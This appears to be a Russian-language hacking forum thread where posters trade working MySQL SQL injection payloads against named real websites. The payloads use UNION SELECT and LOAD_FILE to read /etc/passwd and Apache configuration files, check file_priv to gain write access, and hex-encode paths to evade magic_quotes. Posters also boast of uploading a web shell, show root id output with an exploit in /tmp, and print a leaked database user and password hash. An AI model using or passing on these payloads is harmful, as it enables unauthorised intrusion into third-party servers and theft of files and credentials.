http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9-- ищи тута
Ура. первый раз в жизни залил шелл через SQL. кстати там прав на запись нет. так что лейте шеллы, но деф не сделаеете )))
Code: Давай путь. не жмись. мне в падлу Пашкелкин брутер путей юзать. А он там и не прокатит, там каждый раз содержание запроса в сорцах есть, надо доделывать и под такие ситуации
а вот брутить иногда надо))то что я тебе дал путь , это чисто повезло что с 3 раза нашел конфиг файл))
Раз ушо на то пошло. К теме nub-hacker Code: uid=0(root) gid=0(root) groups=48(apache) context=root:system_r:initrc_t в /tmp лежит сплоит.
Code: 1 file_priv (возможность чтения/записи файлов) Проверяется это так: union+select+file_priv+from+mysql.user+where+user= 'имя юзера' 'имя юзера'- это имя того юзера под которым работает база, т.е. то, что выводится по запросу: union+select+user() но без хоста. Тоесть если вывело root@localhost, то юзер root Значения два, либо "Y"-повезло, либо "N", соответственно неповезло Можно не заморачиваться и сразу попробовать прочитать файл: union+select+LOAD_FILE('/etc/passwd')+from+mysql.user если вывело, нужные привелегии у вашего юзера есть Как я понял это для БД версии 4 А как проверить в 5-ой версии?
тоже самое, только на мой взгляд, чтобы не заморачиваться, правильнее делать так: load_file(0x2f6574632f706173737764) - если linux или load_file(0x633a2f626f6f742e696e69) - если win т.к. magic_quotes может быть ON. ЗЫЖ 1. Пару раз встречал сайты, где значение file_priv в БД было N, а load_file работал 2. Если user() не root - это еще ничего не значит. Каждый 30-ый примерно все равно имеет file_priv=Y (т.е. проверять надо всех подряд, любую скулю)
Pashkela, спасбо. load_file не хочет работать, ошибку выдает. Можно ли как нибуть проверить , чтобы уточнить есть ли парва на чтение и запись файлов у юзера в БД 5 версии? Ну чтобы выводило Y или N
SeNaP Так как ты написал union+select+file_priv+from+mysql.user+where+user= 'имя юзера' если маджики включены, то перевести в hex, а с лоад_файл это не вполне точный метод, бывают ньюансы Это врятли
jokester: Code: Это врятли Code: http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,user()+from+mysql.user/* Ответ: [email protected] http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/* Ответ: N http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,load_file('/etc/passwd')/* Ответ: содержимое /etc/passwd --------------------------------------------------------------------------------------- Или еще может быть такая ситуация: http://www.thiederman.com/products_detail.php?id=-10+union+select+1,file_priv,3,4,5,6+from+mysql.user-- Ответ: Couldn't execute query Но запрос: http://www.thiederman.com/products_detail.php?id=-10+union+select+1,load_file('/etc/passwd'),3,4,5,6-- - положительный Ну хз, может я чего не понимаю По поводу пункта 1 пример: Code: http://www.kasparov.ru/subject.php?id=-74'+union+select+user()+from+mysql.user/* Ответ: [email protected] http://www.kasparov.ru/subject.php?id=-74'+union+select+file_priv+from+mysql.user+where+user()='[email protected]'/* Ответ: Y http://www.kasparov.ru/subject.php?id=-74'+union+select+load_file('/etc/httpd/conf/httpd.conf')/* Ответ: содержимое /etc/httpd/conf/httpd.conf (в сорцах)
Code: http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/* Звезды говорят о другом... Code: User name: [email protected] Fields user:password:file_Priv:host [43]:tltltl:2e52490f15206ead:Y:% Вот так Code: http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user+where+user='tltltl'/*
))) Ок, был неправ, погорячился)) Всегда надо юзать where user=, а лучше не заморачиваться и сразу load_file
Ааааа, я больше не буду)) Просто большиство, насколько я знаю, where не пользуют, поэтому и привёл пример, для наглядности
Без where как раз это не имеет смысла делать. Непонятно что за запись тебе выдаст база. Ну или хотя-бы concat_ws(0x3a,user,file_priv) а там уже искать своего юзера
Code: select file_priv from mysql.user where user=substring_index(user(),0x40,1) and host=substring_index(user(),0x40,-1)
Code: http://censor.net.ua/go/offer/ResourceID/12235-4.html http://censor.net.ua/go/offer/ResourceID/12231.html совпадают, то есть вроде как признак sql инъекции. Но более ничего не подтверждает это. Возможно ли тут запроса внедрение?
Вот взял чужую пхп инъекцию http://forum.antichat.ru/showpost.php?p=1414940&postcount=940 Обясните мне плиз. я не понял каким он образом сформировал /etc/passwd в этот бред. Code: /cte/=htap_elif;dwssap=eman_elif Мне надо понять, плиз. ЗЫ. с меня +++
